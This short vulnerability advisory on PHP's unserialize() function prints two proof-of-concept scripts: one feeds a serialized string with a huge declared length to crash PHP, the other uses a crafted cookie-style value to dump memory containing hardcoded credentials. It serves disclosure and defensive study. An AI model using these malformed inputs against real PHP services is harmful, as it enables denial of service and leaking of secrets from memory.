|
|
PHP Multiple Local And Remote Vulnerabilities
Exploits have been developed by the researcher that discovered these vulnerabilities. These exploits are not believed to be in public circulation. The following unserialize() proof of concept examples are available: EXAMPLE script - "Segfault": ---cut here--- <? $s = 's:9999999:"A";"'; $a = unserialize($s); print $a; ?> ---cut here--- EXAMPLE script - "Memory Dump": ---cut here--- <? // session- and stuff $secret_username="uaaaa"; $secret_password="hoschi"; // stuff // $c = $_COOKIE ['crypted_stuff'] // $c = some cookie /* simplyfied --> userinput */ $c = 's:30000:"crap";'; $userdata = unserialize($c); // // check $userdata stuff // for some reason output $userdata print $userdata . "\n is NOT valid !!\n"; // stuff ?> ---cut here--- overdose <slythers@gmail.com> has made a proof of concept exploit available to demonstrate the unserialize() information disclosure issue. |
|
Privacy Statement |